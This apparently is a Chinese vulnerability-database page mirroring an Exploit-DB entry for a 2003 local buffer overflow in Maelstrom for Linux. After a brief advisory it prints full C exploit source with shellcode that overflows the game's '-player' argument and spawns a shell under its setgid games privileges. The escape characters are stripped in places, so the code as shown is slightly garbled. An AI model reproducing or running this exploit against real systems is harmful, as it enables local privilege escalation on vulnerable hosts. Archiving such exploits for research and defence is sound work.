Maelstrom Player 3.0.x – Argument Buffer Overflow (2)

Maelstrom Player 3.0.x – Argument Buffer Overflow (2)

漏洞ID 1053875 漏洞类型
发布时间 2003-05-20 更新时间 2003-05-20
图片[1]-Maelstrom Player 3.0.x – Argument Buffer Overflow (2)-安全小百科CVE编号 N/A
图片[2]-Maelstrom Player 3.0.x – Argument Buffer Overflow (2)-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22617
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7632/info
 
Maelstrom for Linux has been reported prone to a buffer overflow vulnerability.
 
The issue is reportedly due to a lack of sufficient bounds checking performed on user-supplied data before it is copied into an internal memory space. It may be possible for a local attacker to exploit this condition and have malicious arbitrary code executed in the context of the Maelstrom application. Typically setGID games.
 
It should be noted that although this vulnerability has been reported to affect Maelstrom version 3.0.6 and 3.0.5 previous versions might also be affected. 

/*
 * ==================================================
 * MaelstromX.c /usr/bin/Maelstrom local exploit
 * By: Knight420
 * 05/20/03
 *
 * Gr33tz to: sorbo, sonyy, sloth, and all of #open
 *
 *  -player or -server works
 * ( ./MaelstromX 100 3 ) works on slackware 8.1
 *
 * (C) COPYRIGHT Blue Ballz , 2003
 * all rights reserved
 * =================================================
 *
 */

#include <stdio.h>

#define STACK_START 0xC0000000
#define SWITCH "-player"

char shellcode[] =
        "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
        "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
        "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
        "x31xc0x31xdbx31xc9xb0x46xcdx80xebx1d"
        "x5ex88x46x07x89x46x0cx89x76x08x89xf3"
        "x8dx4ex08x8dx56x0cxb0x0bxcdx80x31xc0"
        "x31xdbx40xcdx80xe8xdexffxffxff/bin/sh";

int main(int argc, char *argv[]) {
        char buff[8200];
        char buff2[8200];
        int *ptr;
        int ret;
        char *arg[] = { "Maelstrom",SWITCH,buff,NULL } ;
        char *env[] = { buff2, NULL };

        if(argc < 2) {
	      printf ("Maelstrom Local Exploit by: Knight420n");  
              printf("Usage: %s <ret> <align>n",argv[0]);
                exit(0);
        }

        ret = STACK_START - atoi(argv[1]);
	  memset(buff,'A',100);
        for(ptr = (int*)&buff[atoi(argv[2])]; ptr < (int*)&buff[8200]; ptr++)
                *ptr = ret;
        buff[sizeof(buff)-1] = 0;
        memcpy(buff,"1@",2);

        snprintf(buff2,sizeof(buff2),"SHELL=%s",shellcode);
	  printf ("Maelstrom Local Exploit by: Knight420n");
        printf ("Return Addr: %pn",ret);
        printf ("Spawning sh3lln");
        execve("/usr/local/bin/Maelstrom",arg,env);
}

相关推荐: HP-UX X窗口权限许可和访问控制漏洞

HP-UX X窗口权限许可和访问控制漏洞 漏洞ID 1207482 漏洞类型 未知 发布时间 1997-09-01 更新时间 1997-09-01 CVE编号 CVE-1999-1133 CNNVD-ID CNNVD-199709-009 漏洞平台 N/A C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享